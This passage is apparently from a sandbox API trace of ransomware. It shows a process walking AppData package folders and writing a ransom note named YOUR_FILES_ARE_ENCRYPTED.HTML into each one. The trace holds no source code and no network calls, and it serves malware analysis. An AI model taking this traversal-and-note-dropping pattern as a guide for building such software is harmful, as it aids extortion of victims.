lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.605] CloseHandle (hObject=0x32c) returned 1 [0115.605] GetProcessHeap () returned 0x600000 [0115.605] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.605] GetProcessHeap () returned 0x600000 [0115.605] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.605] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4e77658a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4e77658a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e77658a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0115.605] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0115.605] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0115.605] GetProcessHeap () returned 0x600000 [0115.605] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BioEnrollment_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bioenrollment_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0115.605] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0115.606] CloseHandle (hObject=0x320) returned 1 [0115.606] GetProcessHeap () returned 0x600000 [0115.606] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.606] GetProcessHeap () returned 0x600000 [0115.606] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0115.607] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1355923f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x15621741, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.CommsPhone_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.COM")) returned 1 [0115.607] StrStrIW (lpFirst="Microsoft.CommsPhone_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.607] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe") returned 83 [0115.607] GetProcessHeap () returned 0x600000 [0115.607] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0115.608] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe" [0115.608] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\*" [0115.608] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x15621741, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x15621741, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.609] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x15621741, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x15621741, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0115.609] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1355923f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1355923f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0115.609] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.609] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC") returned 86 [0115.609] GetProcessHeap () returned 0x600000 [0115.609] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.609] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC" [0115.609] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\*" [0115.609] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1355923f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1355923f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.611] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1355923f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1355923f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="..", cAlternateFileName="")) returned 1 [0115.611] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0115.611] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.611] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCache") returned 96 [0115.611] GetProcessHeap () returned 0x600000 [0115.611] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0115.612] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCache" [0115.612] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCache\\*" [0115.612] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d4b8, dwReserved1=0x62f200, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.617] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d4b8, dwReserved1=0x62f200, cFileName="..", cAlternateFileName="")) returned 1 [0115.617] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d4b8, dwReserved1=0x62f200, cFileName="..", cAlternateFileName="")) returned 0 [0115.617] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.617] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0115.618] GetProcessHeap () returned 0x600000 [0115.618] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.619] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.620] CloseHandle (hObject=0x324) returned 1 [0115.620] GetProcessHeap () returned 0x600000 [0115.620] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.620] GetProcessHeap () returned 0x600000 [0115.620] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0115.620] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0115.620] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.620] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCookies") returned 98 [0115.620] GetProcessHeap () returned 0x600000 [0115.620] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0115.620] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCookies" [0115.620] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0115.620] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d4b8, dwReserved1=0x62f200, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.620] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d4b8, dwReserved1=0x62f200, cFileName="..", cAlternateFileName="")) returned 1 [0115.621] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d4b8, dwReserved1=0x62f200, cFileName="..", cAlternateFileName="")) returned 0 [0115.621] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.621] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0115.621] GetProcessHeap () returned 0x600000 [0115.621] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.621] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.622] CloseHandle (hObject=0x324) returned 1 [0115.623] GetProcessHeap () returned 0x600000 [0115.623] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.623] GetProcessHeap () returned 0x600000 [0115.623] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0115.623] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0115.623] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.623] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetHistory") returned 98 [0115.623] GetProcessHeap () returned 0x600000 [0115.623] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0115.623] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetHistory" [0115.623] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0115.623] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d4b8, dwReserved1=0x62f200, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.623] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d4b8, dwReserved1=0x62f200, cFileName="..", cAlternateFileName="")) returned 1 [0115.623] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d4b8, dwReserved1=0x62f200, cFileName="..", cAlternateFileName="")) returned 0 [0115.623] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.623] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0115.623] GetProcessHeap () returned 0x600000 [0115.623] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.624] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.630] CloseHandle (hObject=0x324) returned 1 [0115.630] GetProcessHeap () returned 0x600000 [0115.630] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.630] GetProcessHeap () returned 0x600000 [0115.630] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0115.631] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="Temp", cAlternateFileName="")) returned 1 [0115.631] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.631] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: 